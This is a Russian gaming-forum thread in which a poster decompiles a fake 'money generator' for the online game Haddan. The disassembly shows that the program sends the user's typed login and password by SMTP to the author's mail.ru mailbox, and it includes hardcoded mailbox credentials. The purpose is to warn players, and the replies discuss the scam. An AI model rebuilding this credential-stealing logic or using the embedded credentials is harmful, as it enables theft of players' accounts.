Правда о супер-взломщике.

Тут последнее время пошел бум на прогу, которая начисляет деньги в Хаддане. Так вот, я сейчас поработую "разрушителем мифов".
Используем декомпилятор дельфей.

00468FE8 55 push ebp
00468FE9 8BEC mov ebp, esp
00468FEB 6A00 push $00
00468FED 6A00 push $00
00468FEF 6A00 push $00
00468FF1 53 push ebx
00468FF2 56 push esi
00468FF3 8BD8 mov ebx, eax
00468FF5 33C0 xor eax, eax
00468FF7 55 push ebp
00468FF8 684F914600 push $0046914F

***** TRY
|
00468FFD 64FF30 push dword ptr fs:[eax]
00469000 648920 mov fs:[eax], esp

* Reference to Form1
|
00469003 8B0D6CCF4600 mov ecx, [$0046CF6C]
00469009 B201 mov dl, $01

* Reference to class TIdMessage
|
0046900B A1C8614600 mov eax, dword ptr [$004661C8]

|
00469010 E807E2FFFF call 0046721C
00469015 8BF0 mov esi, eax

* Possible String Reference to: 'smtp.mail.ru'
|
00469017 BA64914600 mov edx, $00469164

* Reference to control TForm1.IdSMTP1 : TIdSMTP
|
0046901C 8B8304030000 mov eax, [ebx+$0304]
00469022 8B08 mov ecx, [eax]

* Possible reference to virtual method TIdSMTP.OFFS_0088
|
00469024 FF9188000000 call dword ptr [ecx+$0088]
0046902A BADD090000 mov edx, $000009DD

* Reference to control TForm1.IdSMTP1 : TIdSMTP
|
0046902F 8B8304030000 mov eax, [ebx+$0304]
00469035 8B08 mov ecx, [eax]

* Possible reference to virtual method TIdSMTP.OFFS_008C
|
00469037 FF918C000000 call dword ptr [ecx+$008C]
0046903D B201 mov dl, $01

* Reference to control TForm1.IdSMTP1 : TIdSMTP
|
0046903F 8B8304030000 mov eax, [ebx+$0304]

|
00469045 E876FCFFFF call 00468CC0

* Reference to control TForm1.IdSMTP1 : TIdSMTP
|
0046904A 8B8304030000 mov eax, [ebx+$0304]
00469050 05E0000000 add eax, +$000000E0

* Possible String Reference to: 'logpasshad'
|
00469055 BA7C914600 mov edx, $0046917C

* Reference to: System.@LStrAsg(void;void;void;void);
|
0046905A E8E5B2F9FF call 00404344

* Reference to control TForm1.IdSMTP1 : TIdSMTP
|
0046905F 8B8304030000 mov eax, [ebx+$0304]
00469065 05D8000000 add eax, +$000000D8

* Possible String Reference to: '2648749'
|
0046906A BA90914600 mov edx, $00469190

* Reference to: System.@LStrAsg(void;void;void;void);
|
0046906F E8D0B2F9FF call 00404344
00469074 8D55F8 lea edx, [ebp-$08]

* Reference to control TForm1.Edit1 : TEdit
|
00469077 8B83FC020000 mov eax, [ebx+$02FC]

* Reference to: Controls.TControl.

GetText(TControl):TCaption;
|
0046907D E86A84FCFF call 004314EC
00469082 FF75F8 push dword ptr [ebp-$08]
00469085 68A0914600 push $004691A0
0046908A 8D55F4 lea edx, [ebp-$0C]

* Reference to control TForm1.Edit2 : TEdit
|
0046908D 8B8300030000 mov eax, [ebx+$0300]

* Reference to: Controls.TControl.GetText(TControl):TCaption;
|
00469093 E85484FCFF call 004314EC
00469098 FF75F4 push dword ptr [ebp-$0C]
0046909B 8D45FC lea eax, [ebp-$04]
0046909E BA03000000 mov edx, $00000003

* Reference to: System.@LStrCatN;
|
004690A3 E8C8B5F9FF call 00404670
004690A8 8B55FC mov edx, [ebp-$04]

* Reference to field TIdMessage.OFFS_0034
|
004690AB 8B4634 mov eax, [esi+$34]
004690AE 8B08 mov ecx, [eax]
004690B0 FF5138 call dword ptr [ecx+$38]

* Possible String Reference to: '[email protected]'
|
004690B3 BAAC914600 mov edx, $004691AC

* Reference to field TIdMessage.OFFS_0064
|
004690B8 8B4664 mov eax, [esi+$64]

|
004690BB E89CF1FEFF call 0045825C

* Possible String Reference to: '[email protected]'
|
004690C0 BAAC914600 mov edx, $004691AC

* Reference to field TIdMessage.OFFS_0098
|
004690C5 8B8698000000 mov eax, [esi+$0098]

* Reference to : TIdEMailAddressList._PROC_004589C4()
|
004690CB E8F4F8FEFF call 004589C4

* Reference to field TIdMessage.OFFS_0090
|
004690D0 8D8690000000 lea eax, [esi+$0090]

* Possible String Reference to: 'logpass'
|
004690D6 BAC8914600 mov edx, $004691C8

* Reference to: System.@LStrAsg(void;void;void;void);
|
004690DB E864B2F9FF call 00404344
004690E0 83CAFF or edx, -$01

* Reference to control TForm1.IdSMTP1 : TIdSMTP
|
004690E3 8B8304030000 mov eax, [ebx+$0304]
004690E9 8B08 mov ecx, [eax]

* Possible reference to virtual method TIdSMTP.OFFS_0094
|
004690EB FF9194000000 call dword ptr [ecx+$0094]

* Reference to control TForm1.IdSMTP1 : TIdSMTP
|
004690F1 8B8304030000 mov eax, [ebx+$0304]
004690F7 8B10 mov edx, [eax]

* Possible reference to virtual method TIdSMTP.OFFS_54
|
004690F9 FF5254 call dword ptr [edx+$54]
004690FC 84C0 test al, al
004690FE 7410 jz 00469110
00469100 8BD6 mov edx, esi

* Reference to control TForm1.IdSMTP1 : TIdSMTP
|
00469102 8B8304030000 mov eax, [ebx+$0304]
00469108 8B08 mov ecx, [eax]

* Possible reference to virtual method TIdSMTP.OFFS_

00BC
|
0046910A FF91BC000000 call dword ptr [ecx+$00BC]

* Reference to control TForm1.IdSMTP1 : TIdSMTP
|
00469110 8B8304030000 mov eax, [ebx+$0304]
00469116 8B10 mov edx, [eax]

* Possible reference to virtual method TIdSMTP.OFFS_58
|
00469118 FF5258 call dword ptr [edx+$58]
0046911B 6A00 push $00

* Possible String Reference to: 'Выполнено!'
|
0046911D 68D0914600 push $004691D0

* Possible String Reference to: 'Выполнено! Деньги поступят на счёт
| в течении 24 часов!'
|
00469122 68DC914600 push $004691DC
00469127 8BC3 mov eax, ebx

* Reference to: QForms.TCustomForm.GetClientHandle(TCustomForm):QW orkspaceH;
|
00469129 E8E2EBFCFF call 00437D10
0046912E 50 push eax

* Reference to: user32.MessageBoxA()
|
0046912F E8D4DAF9FF call 00406C08
00469134 33C0 xor eax, eax
00469136 5A pop edx
00469137 59 pop ecx
00469138 59 pop ecx
00469139 648910 mov fs:[eax], edx

****** FINALLY
|
0046913C 6856914600 push $00469156
00469141 8D45F4 lea eax, [ebp-$0C]
00469144 BA03000000 mov edx, $00000003

* Reference to: System.@LStrArrayClr(void;void;Integer);
|
00469149 E8C6B1F9FF call 00404314
0046914E C3 ret


* Reference to: System.@HandleFinally;
|
0046914F E9F4AAF9FF jmp 00403C48
00469154 EBEB jmp 00469141

****** END
|
00469156 5E pop esi
00469157 5B pop ebx
00469158 8BE5 mov esp, ebp
0046915A 5D pop ebp
0046915B C3 ret

Собственно, это код на ассемблере той самой программы (TestProg.exe), которую наш кул-хацкер толкает как взломщик Хаддана. Собсно, посмотрите внимательно на следующие строки:
-* Possible String Reference to: 'smtp.mail.ru'
-* Possible String Reference to: 'logpasshad'
-* Possible String Reference to: '2648749'
Как вы думаете, что делают в программе по начислению монет сервер smtp (отправка почты) mail.ru, логин и пароль (судя по всему, от почтового ящика)? Наверное, что-то отправляют. А что же они отправляют?
-* Reference to control TForm1.Edit1 : TEdit
-* Reference to control TForm1.Edit2 : TEdit
-* Reference to: Controls.TControl.GetText(TControl):TCaption;
Две формочки, которые обозначены как логин и пароль. И куда же это все идет?
-* Possible String Reference to: '[email protected]'
На ту же почту, с которой отправляется. Интересно, а деньги то нам даються?
-* Possible String Reference to: 'Выполнено!'
-* Possible String Reference to: 'Выполнено! Деньги поступят на счёт
| в течении 24 часов!'
Вау! Нам дается клятвенное обещание, что деньги придут. Да еще и в течении 24 часов. Только вот никаких телодвижений для этого не сделано.

Внимание, уважаемые знатоки, тьфу ты, пользователи, вопрос! На кой ляд вам пользоваться программой, которая просто отошлет ваши логин и пароль на почту злоумышленнику и ничего не даст взамен? Время пошло.

З.Ы. Если вам это не слишком понятно, то вкратце все звучит так:
Ваши логин и пароль запоминаются и отправляются на мыло [email protected].

о_О какой-то дурак всё же отправил?
Зы. В группе вконтакте он отсылает всем сообщение о этой фигне людям из хаддана

Отвечает Русский Медведь:
Коли юзер с мозгом не дружит, на форум не заглядывает и высокого уровня не имеет, ему это за ким-то лядом нужно! Видимо, жажда власти и фитнесс делают своё дело! И опять силы разума победили силы добра!

Ну а коли юзер двинутый, тьфу ты, продвинутый, то он и смотреть в сторону этой програмки не будет =)

Я даже на 60% знаю кто это

Цитата:

Сообщение от _FauSt VIII_

Я даже на 60% знаю кто это

Кто???

Цитата:

Сообщение от _FauSt VIII_

Я даже на 60% знаю кто это

и чего молчишь тогда?

P.S. Оффтопом вопрос - С++ и Делфи похожи?
А то вроде частички кода вроде Controls.TControl.GetText(TControl):TCaption; Борландовский билдер напоминает ппц как... (Делфи впервые вижу так что не ругайте)

Цитата:

Сообщение от Koshey

и чего молчишь тогда?

P.S. Оффтопом вопрос - С++ и Делфи похожи?
А то вроде частички кода вроде Controls.TControl.GetText(TControl):TCaption; Борландовский билдер напоминает ппц как... (Делфи впервые вижу так что не ругайте)

Дельфи - сие есть продукт Борланда. Так что не удивительно.
Только Delphi построен на базе Object Pascal

Цитата:

Сообщение от Maelstorm

Дельфи - сие есть продукт Борланда. Так что не удивительно.
Только Delphi построен на базе Object Pascal

Спасибо, буду знать впредь

Да те, кто тут отпишется, скорее всего и не смотрели в сторону этого "хацкера". А вот как сказал Медведь, новайсы вполне могут попасться, особливо, если в мирах он-лайн игр они впервые.
Но за развернутый код, спасибо.

Ну а про код-то вы, наверное, напрасно так выложили ) я не знаком с Дэльфи и прочими языками програмирования (кроме ВБ), но могу поспорить, что щас всякие хацкеры-самоучки попрутся делать нечто подобное и скоро у нас такого добра будет как... ну, грязи что ли